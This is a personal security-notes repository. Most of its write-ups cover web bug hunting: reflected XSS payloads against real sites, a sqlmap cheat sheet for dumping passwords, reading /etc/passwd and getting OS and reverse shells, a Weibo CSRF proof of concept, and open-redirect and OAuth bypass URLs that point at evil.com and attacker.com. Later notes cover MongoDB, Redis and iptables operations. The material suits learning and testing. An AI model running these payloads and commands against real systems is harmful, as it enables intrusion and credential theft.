├── .gitignore
├── 2015-09-05-XSS_encodeURI.html
├── 2015-09-12-XSS_Reflected.md
├── 2015-09-16-XSS.md
├── 2015-11-07-SQLMap.md
├── 2015-11-08-MyWay.md
├── 2015-11-18-WeiboCSRF.md
├── 2016-03-16-XSS.md
├── 2016-05-16-Bypass-URL-Check.md
├── 2016-05-17-Bypass-Chrome-XSS-Auditor.md
├── 2016-06-07-document.domain的妙用.md
├── 2016-06-27-location.hash绕过长度限制.md
├── 2016-07-18-JS语法错误vs语义错误.md
├── 2016-08-05-利用XSSAuditor阻止网站加载指定的JS文件.md
├── 2016-08-13-HPP-and-URL-Bypass.md
├── 2016-09-07-Weird-Behavior-of-IE.md
├── 2016-09-15-外部服务被劫持导致信息泄露.md
├── 2016-10-13-Flask-MongoEngine连接问题的思考.md
├── 2016-11-05-RedisSentinel配置失误.md
├── 2016-11-05-软链接引起的事故.md
├── 2016-11-10-配置Mongodb集群的问题.md
├── 2016-11-15-iptables相关配置.md
├── 2016-11-18-supervisor常用操作.md
├── 2017-03-22.md
├── 2017-03-23.md
├── 2017-03-24.md
├── 2017-03-30.md
├── 2017-04-01.md
├── 2017-04-16.md
├── 2017-08-27-找出是谁登录了你的Gitlab服务器.md
├── README.md
├── addthis_poc
└── poc.html
├── images
└── 20150916232022.png
└── tools
├── crxmake.py
├── generate_csrf_form.py
├── hunt.py
├── requirements.txt
├── top_100_pass.txt
├── xss_via_redirect.py
└── zf.py
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 |
--------------------------------------------------------------------------------
/2015-09-05-XSS_encodeURI.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
33 |
34 |
--------------------------------------------------------------------------------
/2015-09-12-XSS_Reflected.md:
--------------------------------------------------------------------------------
1 | ## 反射型漏洞
2 |
3 | 直接把URL的输出在iframe的src中,对,没有过滤。这个问题我都不想记了。
4 |
5 | ```
6 | URL:http://www.xxxxx.net/yun/index.php?m=Index&c=Content&a=index&cid=21&aid=3
7 | ```
8 |
9 | 页面HTML中出现了:
10 |
11 | ```html
12 |
14 | ```
15 |
16 | Payload:
17 |
18 | ```
19 | URL: http://www.xxxxx.net/yun/index.php?m=Index&c=Content&a=index&mid=1&cid=21aaa&aid=3%22%20onmouseover=%22alert%281%29
20 | ```
21 |
22 | 这个会被`Chrome`的xss过滤器拦截,在其他浏览器下可以。
23 |
--------------------------------------------------------------------------------
/2015-09-16-XSS.md:
--------------------------------------------------------------------------------
1 | ## 搜索楼盘接口存在XSS问题
2 |
3 | POC
4 |
5 | ```html
6 | http://sz.xxxx.com/loupan/rs%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
7 | ```
8 |
9 | 原因:反射型XSS,输出到HTML页面了,同时要保存到cookie里,造成重复触发。
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/2015-11-07-SQLMap.md:
--------------------------------------------------------------------------------
1 | sqlmap工具
2 | ==========
3 |
4 | sqlmap官网: https://github.com/sqlmapproject/sqlmap
5 |
6 | sqlmap实例(摘抄自 https://github.com/LiveXY/elearning/blob/master/sqlmap%E5%B7%A5%E5%85%B7.md ):
7 |
8 | * 获取当前用户名称
9 |
10 | ```bash
11 | $sqlmap -u "http://url/news?id=1" --current-user
12 | ```
13 |
14 | * 获取当前数据库名称
15 |
16 | ```bash
17 | $sqlmap -u "http://www.xxoo.com/news?id=1" --current-db
18 | ```
19 |
20 | * 列表名
21 |
22 | ```bash
23 | $sqlmap -u "http://www.xxoo.com/news?id=1" --tables -D "db_name"
24 | ```
25 |
26 | * 列字段
27 |
28 | ```bash
29 | $sqlmap -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0
30 | ````
31 |
32 | * 获取字段内容
33 |
34 | ```bash
35 | $sqlmap -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0
36 | ```
37 |
38 | * smart智能 level 执行测试等级
39 |
40 | ```bash
41 | $sqlmap -u "http://url/news?id=1" --smart --level 3 --users
42 | ```
43 |
44 | * dbms 指定数据库类型
45 |
46 | ```bash
47 | $sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users
48 | ```
49 |
50 | * 列数据库用户
51 |
52 | ```bash
53 | $sqlmap -u "http://url/news?id=1" --users
54 | ```
55 |
56 | * 列数据库
57 |
58 | ```bash
59 | $sqlmap -u "http://url/news?id=1" --dbs
60 | ```
61 |
62 | * 数据库用户密码
63 |
64 | ```bash
65 | $sqlmap -u "http://url/news?id=1" --passwords
66 | ```
67 |
68 | * 列出指定用户数据库密码
69 |
70 | ```bash
71 | $sqlmap -u "http://url/news?id=1" --passwords-U root -v 0
72 | ```
73 |
74 | * 列出指定字段,列出20条
75 |
76 | ```bash
77 | $sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20
78 | ```
79 |
80 | * 列出所有数据库所有表
81 |
82 | ```bash
83 | $sqlmap -u "http://url/news?id=1" --dump-all -v 0
84 | ```
85 |
86 | * 查看权限
87 |
88 | ```bash
89 | $sqlmap -u "http://url/news?id=1" --privileges
90 | ```
91 |
92 | * 查看指定用户权限
93 |
94 | ```bash
95 | $sqlmap -u "http://url/news?id=1" --privileges -U root
96 | ```
97 |
98 | * 是否是数据库管理员
99 |
100 | ```bash
101 | $sqlmap -u "http://url/news?id=1" --is-dba -v 1
102 | ```
103 |
104 | * 枚举数据库用户角色
105 |
106 | ```bash
107 | $sqlmap -u "http://url/news?id=1" --roles
108 | ```
109 |
110 | * 导入用户自定义函数(获取系统权限!)
111 |
112 | ```bash
113 | $sqlmap -u "http://url/news?id=1" --udf-inject
114 | ```
115 |
116 | * 列出当前库所有表
117 |
118 | ```bash
119 | $sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0
120 | ```
121 |
122 | * union 查询表记录
123 |
124 | ```bash
125 | $sqlmap -u "http://url/news?id=1" --union-cols
126 | ```
127 |
128 | * cookie注入
129 |
130 | ```bash
131 | $sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE"
132 | ```
133 |
134 | * 获取banner信息
135 |
136 | ```bash
137 | $sqlmap -u "http://url/news?id=1" -b
138 | ```
139 |
140 | * post注入
141 |
142 | ```bash
143 | $sqlmap -u "http://url/news?id=1" --data "id=3"
144 | ```
145 |
146 | * 指纹判别数据库类型
147 |
148 | ```bash
149 | $sqlmap -u "http://url/news?id=1" -v 1 -f
150 | ```
151 |
152 | * 代理注入
153 |
154 | ```bash
155 | $sqlmap -u "http://url/news?id=1" --proxy"http://127.0.0.1:8118"
156 | ```
157 |
158 | * 指定关键词
159 |
160 | ```bash
161 | $sqlmap -u "http://url/news?id=1" --string"STRING_ON_TRUE_PAGE"
162 | ```
163 |
164 | * 执行指定sql命令
165 |
166 | ```bash
167 | $sqlmap -u "http://url/news?id=1" --sql-shell
168 | ```
169 |
170 | * Dump文件
171 |
172 | ```bash
173 | $sqlmap -u "http://url/news?id=1" --file /etc/passwd
174 | ```
175 |
176 | * 执行系统命令
177 |
178 | ```bash
179 | $sqlmap -u "http://url/news?id=1" --os-cmd=whoami
180 | ```
181 |
182 | * 系统交互shell
183 |
184 | ```bash
185 | $sqlmap -u "http://url/news?id=1" --os-shell
186 | ```
187 |
188 | * 反弹shell
189 |
190 | ```bash
191 | $sqlmap -u "http://url/news?id=1" --os-pwn
192 | ```
193 |
194 | * 读取win系统注册表
195 |
196 | ```bash
197 | $sqlmap -u "http://url/news?id=1" --reg-read
198 | ```
199 |
200 | * 保存进度
201 |
202 | ```bash
203 | $sqlmap -u "http://url/news?id=1" --dbs-o "sqlmap.log"
204 | ```
205 |
206 | * 恢复已保存进度
207 |
208 | ```bash
209 | $ sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume
210 | ```
211 |
212 | * google搜索注入点自动 跑出所有字段攻击实例
213 |
214 | ```bash
215 | $sqlmap -g "google语法" --dump-all --batch
216 | ```
217 |
218 | * 带Cookie
219 |
220 | ```bash
221 | $sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password
222 | ```
223 |
--------------------------------------------------------------------------------
/2015-11-08-MyWay.md:
--------------------------------------------------------------------------------
1 | 前两天一时兴起在知乎回答了一个问题,虽然没什么赞,也算是自我反思记录吧!
2 |
3 | 我来回答一记,最近正在努力成为一个脚本小子中,乌云Rank应该快到可以从路人变成实习白帽子了。
4 |
5 | 我是出于什么目的呢?业余爱好。本科选修Web安全的课程完全是冲着好玩去的,蔡国杨老师安排的课程的确不错。那个时候学到了很多基础知识:XSS,SQL注入,CSRF,Buffer Overflow等,助教师兄还把[google/gruyere](https://google-gruyere.appspot.com/)(谷歌出品的实验)拿来给我们做作业。但我跟你一样,连脚本小子都不如,想找网站的漏洞一样没思路。不过当时我偷偷保存着学校教育系统的越权漏洞(这个名词很装逼),还有一个可以从学号查学生信息的方法,当然,还有一个老师修改课程成绩的漏洞(这个发现之后立马上报给辅导员了,我是好人吧!)。上面提到的这些漏洞只要细心就能找到,而我当时并不觉得是漏洞,只是纯粹好玩。读研期间忙实习,忙着参与开源项目做代码贡献,就没放太多精力在这上面了。而到了最近毕业开始工作了,工作之余要给自己找点乐子(有朋友教我做个有趣的人,别老是跟电脑过不去,可惜我的爱好少得可怜,追追美剧,学学做菜,打打篮球,千万别学我,没救的),加上有两个朋友也开始做渗透测试的工作。所以我又重新燃起了当时玩的激情,却发现一玩不可收拾了。利用业务时间,看完了余弦大大的《Web前端黑客技术揭秘》,看了乌云上心伤的瘦子的XSS教程,开始乌云刷Rank之路。
6 |
7 | 第一个问题无非就是怎么找目标?我目前也没有什么好方法。只能说多留心吧,前段时间买衣服,发现快递到货要装一个APP才能取件,于是我就装了。拿完衣服后,随手测试发现了该厂商存在的任意密码重置问题,在乌云上报了之后还说要给我发礼物。再分享一个故事,之前参加沙龙见到的核心白帽子:专业种田,听他介绍了Burpsuite的用法,怎么用搜索找洞等姿势,不过重点不是这个,重点是他在回深圳时需要去广州南站,然后他在广州南站发现了:广州高铁站手机充电终端沙盒绕过(可留后门控制手机)的漏洞,让我惊叹他真的是走到哪黑到哪。
8 |
9 | 找到目标之后发现自己实力不够?这个需要基础知识加细心吧我觉得,绝大部分的漏洞并没有想象中的难,至少从我在乌云上看过的漏洞来说。SQL注入,名字大家都懂,工具sqlmap大家都可以用,可是用了之后知道内部原理吗?XSS打Cookies,需要懂前端知识吧?上传一句话GetShell,菜刀连接直捣黄龙,你需要知道人家用的什么后台吧,JSP/PHP/ASP/Python等等语言你得懂吧?正面刚人家找不到漏洞,可以找找旁域和C段,没有一点点DNS和IP地址的基础知识怎么能行呢?所以没有基础,即使漏洞摆在眼前也是白搭吧。
10 |
11 | 所以,我觉得我还是要沉住气,不能浮夸,多多补充基础知识。
12 |
13 | * 看前人留下的资料:乌云上的漏洞很多精华的思路,多看,打开自己的眼界。(我目前只是看乌云园区里的讨论,乌云Wiki,乌云公开的漏洞)
14 | * 有条件复现漏洞环境的尽量进行测试,多动手才好玩啊!比如最近公开的漏洞:【乌云峰会】网易闪电邮远程命令执行附思路分析,完全可以找个旧版本的软件玩玩,玩一次的记忆绝对比你光看要强。
15 | 尝试分享,目前自己做的还不够,希望自己能静下心来多写写东西。
16 |
17 | 这是我最近一段时间的经验分享和自己的一点思考,只是发出来供参考。关于找人带入门的问题:我觉得没人带一样可以找到很多东西学,智商不足勤奋补上嘛!要学会搜索!还有,这篇文章不是乌云的广告贴,我只是把在乌云上刷Rank当成激励自己的目标。
18 |
19 |
20 | 知乎链接:http://www.zhihu.com/question/37062603/answer/71139922
21 |
--------------------------------------------------------------------------------
/2015-11-18-WeiboCSRF.md:
--------------------------------------------------------------------------------
1 | ## CSRF漏洞之你点我链接就会发一条微博
2 |
3 | 注:非本人发现,看到微博上一位大大在玩。
4 |
5 | 防范CSRF漏洞有两种方式,一种是生成表单的时候插入Token,提交的时候后端验证Token是否合法,另外一种就是验证请求的`Referer`是否来自自己的域名。微博电影上的分享内容到微博的接口采用的后面的方式,在服务端验证。然而,验证好像写错了,正确的姿势应该是验证域名的后缀吧,但微博的后台开发验证是:只要域名里有`weibo.com`就认为是合法的请求。
6 |
7 | ### POC
8 |
9 | * test.html
10 |
11 | ```html
12 |
13 |
20 |
21 |
24 | ```
25 |
26 | * 找个域名,设置一个子域,如:`weibo.com.xxx.com`
27 |
28 | * 在已经登录了微博的浏览器里访问:http://weibo.com.xxx.com/test.html 。
29 | * 也可以设置本地hosts,`127.0.0.1 weibo.com.xxx.com`,然后启动一个HTTP服务器,如:`python -m SimpleHTTPServer 80`
30 |
--------------------------------------------------------------------------------
/2016-03-16-XSS.md:
--------------------------------------------------------------------------------
1 | ## 又一次失败的测试过程
2 |
3 | URL: http://www.acfun.tv/info/status#msgTitle=false;msgContent=4;show=false;email=asdf
4 |
5 | 分析过程
6 |
7 | ```js
8 | ...
9 | var t, e, n, h, a;
10 | switch (h = $.hash("msgTitle"),
11 | n = $.hash("msgContent"),
12 | a = $.hash("show"),
13 | e = $.hash("email"),
14 | t = "",
15 | n) {
16 | case "1":
17 | t = "本链接已经被使用,请重新验证";
18 | break;
19 | case "2":
20 | t = "出现明目外错误请联系客服";
21 | break;
22 | case "3":
23 | t = "本链接已过期,请重新修改";
24 | break;
25 | case "4":
26 | t = "您的邮箱为:" + e
27 | }
28 | return $(".content").html(t),
29 | ...
30 | ```
31 |
32 | 1. 当`n`为4的时候,会将`t`的值输出到`.content`中。咦,那不是可以XSS?
33 | 2. 直接传入``,发现`<(/`等都被过滤
34 | 3. 发现`\`并没有被过滤,JS十进制或者八进制编码能不能?```\x3cscript\x3ealert`1`\x3c/script\x3e```
35 | 4. 无果,具体现象如下:
36 |
37 | ```html
38 |
39 |
40 |
41 |
46 | // FAILED http://localhost/#\x3cscript\x3ealert(1)\x3c/script\x3e
47 | var hash = window.location.hash.substring(1);
48 | $('.xss').html(hash);
49 |
50 | ```
51 |
52 | 注意:输出点是在JS文件中,还是JS去读取存入变量。前者会自动将十进制或者八进制的编码的字符串解码,而后者不会。至此,本次测试宣布以失败告终。
53 |
--------------------------------------------------------------------------------
/2016-05-16-Bypass-URL-Check.md:
--------------------------------------------------------------------------------
1 | ## URL检查不严格被绕过的几种情况
2 |
3 | 1. 只检查了URL中是否有合法的域名地址,绕过方式很简单,直接用:`http://evil.com/?http://victim.com`即可。
4 | 2. 前缀校验不严格,前缀应该以`/`结尾的,但没有,绕过:`http://victim.com@evil.com/`或者`http://victim.com.evil.com`
5 | 3. 使用`?`绕过检查,在 http://wooyun.org/bugs/wooyun-2016-0178241 中学到的,`http://evil.com?.victim.com`会被浏览器识别为`http://evil.com/?.victim.com`
6 | 4. From: http://www.slideshare.net/fransrosen/the-secret-life-of-a-bug-bounty-hunter-frans-rosn-security-fest-2016
7 | * https://www.victim.com/account/logout?redirect_url=https://example.com\@www.victim.com
8 | * https://www.linkedin.com/uas/login?session_redirect=https://example.com%252f@www.linkedin.com%2Fsettings
9 | * https://vimeo.com/log_in?redirect=/%09/example.com
10 | * https://test6473.zendesk.com/access/login?return_to=//example.com:%252525252f@test6473.zendesk.com/x
11 | * https://trello.com/login?returnUrl=/\example.com
12 |
--------------------------------------------------------------------------------
/2016-05-17-Bypass-Chrome-XSS-Auditor.md:
--------------------------------------------------------------------------------
1 | FROM: https://html5sec.org/xssauditor/bypasses-052016?xss=%3Clink%20rel=import%20href=https:html5sec.org/
2 |
3 | ## XSS Auditor Bypasses 05.2016
4 | The bypasses are different for HTTP and HTTPS pages. Here, you can try both variants.
5 |
6 | ### HTTP Pages
7 |
8 | (visit this page via HTTP)
9 | > ?xss= ?xss=Error 404
25 | ```
26 |
27 | ### Chrome Version
28 | Google Chrome 49.0.2623.75 (Official Build) m (32-bit)
29 |
--------------------------------------------------------------------------------
/2016-06-07-document.domain的妙用.md:
--------------------------------------------------------------------------------
1 | ## document.domain的妙用
2 |
3 | 在[QQ浏览器9本地文件读取&远程命令执行](http://wooyun.org/bugs/wooyun-2010-0176314)里用到了一个关于`documnet.domain`的小技巧。
4 |
5 | 页面 http://event.browser.qq.com/stdl/miyue/index.html 里前端存在代码 [header.js](http://stdl.qq.com/stdl/tq_center/activity/common/header.js) 设置了其domain为`qq.com`。这意味着,如果`qq.com`的任意一个子域名通过iframe加载上述的页面,只要也设置了相同的domain,就能够访问到event.brrowser上的window对象。
6 |
7 | ```javascript
8 | try {
9 | document.domain = 'qq.com';
10 | } catch(e) {
11 | }
12 | ```
13 |
14 | ### 例子
15 |
16 | 案例中用的是XSS,本地测试可以修改一下`hosts`文件,加一个qq的子域名,比如`127.0.0.1 test.qq.com`,然后用QQ浏览器访问下面这个页面,就可以看到QQ浏览器被安装了指定的扩展。
17 |
18 | http://test.qq.com/index.html
19 |
20 | ```html
21 |
22 |
23 |
24 |
39 |
40 | ```
41 |
--------------------------------------------------------------------------------
/2016-06-27-location.hash绕过长度限制.md:
--------------------------------------------------------------------------------
1 | ```bash
2 | $ curl -v "http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1))#alert(document.cookie);"
3 | * Trying 127.0.0.1...
4 | * Connected to 127.0.0.1 (127.0.0.1) port 1080 (#0)
5 | > GET http://****.edu.cn/go.asp?url=javascript\u003aeval(location.hash.slice(1)) HTTP/1.1
6 | > User-Agent: curl/7.41.0
7 | > Host: ****.edu.cn
8 | > Accept: */*
9 | > Proxy-Connection: Keep-Alive
10 | >
11 | < HTTP/1.1 200 OK
12 | < Connection: close
13 | < Date: Mon, 27 Jun 2016 06:13:31 GMT
14 | < Server: Microsoft-IIS/6.0
15 | < X-Powered-By: ASP.NET
16 | < Content-Length: 113
17 | < Content-Type: text/html
18 | < Set-Cookie: ASPSESSIONIDCCTTQQQQ=KLNDIOEAOHCIMEMFJMOOMCHN; path=/
19 | < Cache-control: private
20 | < Proxy-Connection: keep-alive
21 | <
22 |
23 | * Closing connection 0
26 | ```
27 |
28 | 限制信息:url字符串长度不能超过100,而且会检查一些关键字,比如`url=javascript:alert(1);`会被拦截,但可以用JS编码绕过。
29 |
--------------------------------------------------------------------------------
/2016-07-18-JS语法错误vs语义错误.md:
--------------------------------------------------------------------------------
1 | ```html
2 |
11 |
12 |
13 | ```
14 |
15 | 上面的代码是正确的JS代码,打开这个页面能够正常地弹出窗口,只是运行时会出错
16 | ```js
17 | Uncaught ReferenceError: indexOf is not defined
18 | ```
19 | 而如果把`targetPage^indexOf(":") != -1`修改成`targetPage#indexOf(":") != -1`则会报
20 | ```js
21 | test.html:3 Uncaught SyntaxError: Invalid or unexpected token
22 | test.html:11 Uncaught TypeError: top.loadFrames is not a function
23 | ```
24 |
25 | `a^b` vs `a#b`
26 | > A crucial difference from # and ^, the # is not the operator in JavaScript, but the ^ is the operator. For example, if the a.b; is in the page and it is replaced with # and ^, a#b; is the syntax error but a^b; is valid syntax.
27 |
28 | From: http://mksben.l0.cm/2016/07/xxn-caret.html
29 |
--------------------------------------------------------------------------------
/2016-08-05-利用XSSAuditor阻止网站加载指定的JS文件.md:
--------------------------------------------------------------------------------
1 | 当`X-XSS-Protection: 1`的时候,我们可以通过在请求参数中填入一些会在网页中出现的代码,使得过滤器以为这是个XSS攻击,然后阻止该文件的执行,导致指定的网页不加载特定的JS文件,例如:
2 |
3 | http://www.qq.com/?%3Cscript%20type=%22text/javascript%22%20src=%22http://mat1.gtimg.com/www/asset/lib/jquery/jquery/jquery-1.11.1.min.js%22%3E%3C/script%3E
4 |
5 | 
6 |
--------------------------------------------------------------------------------
/2016-08-13-HPP-and-URL-Bypass.md:
--------------------------------------------------------------------------------
1 | ## HTTP Parameter Pollution
2 |
3 | From https://hackerone.com/reports/114169
4 |
5 | For example:
6 |
7 | > https://www.digits.com/login?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.com
8 |
9 | The first host (host=https://www.periscope.tv) is validated but not the second one. After authentication the second host (host=https://attacker.com) is used as the transfer origin.
10 |
11 | ## URL Bypass
12 | From https://hackerone.com/reports/108113
13 |
14 | However, it is discovered that when outputting a non-ASCII character in the header, it will get converted to a question mark (?). This happens after the validation. Thus, attacker can bypass the validation by putting his/her own domain followed by a non-ASCII character in the authority part.
15 |
16 | Here's how it works:
17 |
18 | Input:
19 |
20 | ```
21 | https://attacker.com%ff@www.periscope.tv
22 | --------\ authority /\ hostname /
23 | ```
24 | The URL is parsed and passes the validation because the hostname matches the registered domain.
25 |
26 | Output:
27 | ```
28 | https://attacker.com?@www.periscope.tv
29 | --------\ hostname /-\ query /
30 | ```
31 | Since the URL is outputted in the location header, `%ff` which is non-ASCII is converted. Now suddenly the hostname becomes attacker.com and everything after the question mark becomes the query part. Finally the victim will be redirected to attacker's site with victim's account's OAuth credential.
32 |
--------------------------------------------------------------------------------
/2016-09-07-Weird-Behavior-of-IE.md:
--------------------------------------------------------------------------------
1 | ```bash
2 | $ curl -i "https://httpbin.org/redirect-to?url=http://%2577%2577%2577%252E%256D%2569%2563%2572%256F%2573%256F%2566%2574%252E%2563%256F%256D/test"
3 |
4 | HTTP/1.1 302 FOUND
5 | Location: http://%77%77%77%2E%6D%69%63%72%6F%73%6F%66%74%2E%63%6F%6D/test
6 | ```
7 |
8 | * Redirected URL for Internet Explorer: http://www.microsoft.com9crosoft.com/test
9 | * Redirected URL for other browsers: http://www.microsoft.com/test
10 |
11 | From: http://blog.innerht.ml/internet-explorer-has-a-url-problem/
12 |
--------------------------------------------------------------------------------
/2016-09-15-外部服务被劫持导致信息泄露.md:
--------------------------------------------------------------------------------
1 | From: http://blog.pentestnepal.tech/post/149985438982/reading-ubers-internal-emails-uber-bug-bounty
2 |
3 | ## 思路分析
4 |
5 | * 重点:添加`inbound parse webhook`,SendGrid没有强制验证邮件接受者的域名就是用户所持有。
6 | * 过程:
7 | 1. 添加一个Webhook url
8 | 2. 任何发送到被指定域名的邮件都会被Webhook url所接收
9 |
--------------------------------------------------------------------------------
/2016-10-13-Flask-MongoEngine连接问题的思考.md:
--------------------------------------------------------------------------------
1 | ## Flask MongoDB数据库连接
2 |
3 | 在使用Flask进行MongoDB数据库的操作的时候,总觉得没有写检查数据库连接是否存在,如果连接不上,则尝试重连的操作,但线上的服务总能保持住连接,一直没细看。
4 |
5 | 今天尝试了一下,如果支持关闭MongoDB的服务,会出现什么情况?
6 |
7 | ```bash
8 | $ sudo lsof -i:27017
9 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
10 | uwsgi 2929 www-data 13u IPv4 19497 0t0 TCP flask-app.dev.env:35686->flask-app.dev.env:27017 (ESTABLISHED)
11 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (ESTABLISHED)
12 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (ESTABLISHED)
13 | mongod 3328 mongodb 9u IPv4 19377 0t0 TCP flask-app.dev.env:27017 (LISTEN)
14 | mongod 3328 mongodb 12u IPv4 19498 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35686 (ESTABLISHED)
15 | mongod 3328 mongodb 13u IPv4 20420 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35688 (ESTABLISHED)
16 | mongod 3328 mongodb 16u IPv4 20578 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35689 (ESTABLISHED)
17 | ```
18 |
19 | 目前每个uwsgi进程都连接着MongodDB的服务器。停止MongoDB服务,发现Socket连接进入了`CLOSE_WAIT`的状态。此时Web服务器出现了500。
20 |
21 | ```bash
22 | $ sudo service mongodb stop
23 | mongodb stop/waiting
24 | $ sudo lsof -i:27017
25 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
26 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (CLOSE_WAIT)
27 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (CLOSE_WAIT)
28 | ```
29 |
30 | 重新启动MongoDB,不做其他操作。
31 |
32 | ```bash
33 | $ sudo service mongodb start
34 | mongodb start/running, process 4103
35 | $ sudo lsof -i:27017
36 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
37 | uwsgi 2938 www-data 6u IPv4 20577 0t0 TCP flask-app.dev.env:35689->flask-app.dev.env:27017 (CLOSE_WAIT)
38 | uwsgi 2939 www-data 6u IPv4 20419 0t0 TCP flask-app.dev.env:35688->flask-app.dev.env:27017 (CLOSE_WAIT)
39 | mongod 4103 mongodb 9u IPv4 24443 0t0 TCP flask-app.dev.env:27017 (LISTEN)
40 | ```
41 |
42 | 可以看到,连接还是没有建立。尝试访问相应的Web服务,发现服务慢慢恢复正常。
43 |
44 | ```bash
45 | $ sudo lsof -i:27017
46 | COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
47 | uwsgi 2929 www-data 13u IPv4 24558 0t0 TCP flask-app.dev.env:35707->flask-app.dev.env:27017 (ESTABLISHED)
48 | uwsgi 2938 www-data 6u IPv4 24745 0t0 TCP flask-app.dev.env:35709->flask-app.dev.env:27017 (ESTABLISHED)
49 | uwsgi 2939 www-data 6u IPv4 24636 0t0 TCP flask-app.dev.env:35708->flask-app.dev.env:27017 (ESTABLISHED)
50 | mongod 4103 mongodb 9u IPv4 24443 0t0 TCP flask-app.dev.env:27017 (LISTEN)
51 | mongod 4103 mongodb 12u IPv4 24559 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35707 (ESTABLISHED)
52 | mongod 4103 mongodb 13u IPv4 24637 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35708 (ESTABLISHED)
53 | mongod 4103 mongodb 16u IPv4 24746 0t0 TCP flask-app.dev.env:27017->flask-app.dev.env:35709 (ESTABLISHED)
54 | ```
55 |
56 | Web服务还是能恢复的。但是,在后续尝试的过程中发现,如果在有持续访问的情况下,连接状态会进入`CLOSE_WAIT`状态,并且很难重新连接上,HTTP请求大量504,重启uwsgi进程才能恢复回正常。
57 |
58 | 另外,补充一个连接池的文档:http://api.mongodb.com/python/current/faq.html#how-does-connection-pooling-work-in-pymongo
59 |
60 | 尝试解决这个问题,发现是uwsgi的日志中存在以下信息:
61 | ```
62 | /home/vagrant/env/local/lib/python2.7/site-packages/pymongo/topology.py:143: UserWarning: MongoClient opened before fork. Create MongoClient with connect=False, or create client after forking. See PyMongo's documentation for details: http://api.mongodb.org/python/current/faq.html#using-pymongo-with-multiprocessing>
63 | "MongoClient opened before fork. Create MongoClient "
64 | ```
65 |
66 | 发现原来是uwsgi在启动子进程前,`MongoClient`就已经创建,而文档中要求这种情况下需要使用`connect=False`选项,然而Flask-MongoEngine并没有处理这个配置。https://github.com/MongoEngine/flask-mongoengine/issues/266 这就是坑。
67 |
68 | 另外一个方式:让uwsgi的子进程创建MongoClient而不是加载好app之后再fork进程,uwsgi启动选项:[lazy-apps](http://uwsgi-docs.readthedocs.io/en/latest/Options.html#lazy-apps),增加了应用的启动时间。
69 |
--------------------------------------------------------------------------------
/2016-11-05-RedisSentinel配置失误.md:
--------------------------------------------------------------------------------
1 | 在配置Redis Sentinel的时候,出现了一个现象:同时启动程序和redis-sentinel,能够正常连接,
2 | 但过了30秒后再启动程序连接redis-sentinel,就会报:`MasterNotFound/SlaveNotFound`的错误,
3 | 同时日志中出现以下的错误:
4 |
5 | ```bash
6 | [16036] 02 Nov 16:24:14.048 # Sentinel runid is 5e67e92ea843190baa6b2acea31ead4796fe2e92
7 | [16036] 02 Nov 16:33:17.585 # +sdown master mymaster 127.0.0.1 6379
8 | ```
9 |
10 | 原因:redis-sentinel会定期Ping Redis服务器,但由于我很久之前配置的时候傻逼了,在redis上配置了
11 | 密码,但忘记配置redis-sentinel访问redis的密码。但由于配置时间过去太久,找问题的时候就没想到是这个,
12 | 浪费了些时间。
13 |
--------------------------------------------------------------------------------
/2016-11-05-软链接引起的事故.md:
--------------------------------------------------------------------------------
1 | From: https://hackerone.com/reports/178152
2 |
3 | 处理用户上传的文件的时候,压缩包中包含有软链接,使用JSON读取的时候没有过滤掉,并将出错的结果暴露给了前端,导致服务器文件泄露。
4 |
--------------------------------------------------------------------------------
/2016-11-10-配置Mongodb集群的问题.md:
--------------------------------------------------------------------------------
1 | * `ulimit` 不是一个可执行程序,而是一个内置shell script函数,导致在脚本文件中使用`dash`解析执行的时候会出现以下错误,使用`#!/bin/bash`解析执行可解决问题。
2 |
3 | ```bash
4 | ulimit: Illegal option -u
5 | ```
6 |
7 | 参考:https://github.com/edelight/chef-mongodb/issues/146
8 |
--------------------------------------------------------------------------------
/2016-11-15-iptables相关配置.md:
--------------------------------------------------------------------------------
1 | 只允许DNS解析,NTP日期同步,Ping,IP白名单内的访问(入/出)
2 |
3 | ```bash
4 | #!/bin/bash
5 |
6 | set -o nounset
7 | set -o errexit
8 |
9 | echo "clean all rules before"
10 | iptables -F
11 | iptables -X
12 |
13 | echo "setting up default rules"
14 | iptables -P FORWARD ACCEPT
15 | iptables -P INPUT ACCEPT
16 | iptables -P OUTPUT ACCEPT
17 |
18 | declare -a whitelist=(
19 | "192.168.1.1"
20 | "192.168.1.2")
21 |
22 | echo "setting up input chain"
23 | /sbin/iptables -A INPUT -i lo -j ACCEPT # allow local address
24 | /sbin/iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT # allow exist connection
25 | for i in "${whitelist[@]}"
26 | do
27 | /sbin/iptables -A INPUT -s $i -j ACCEPT
28 | done
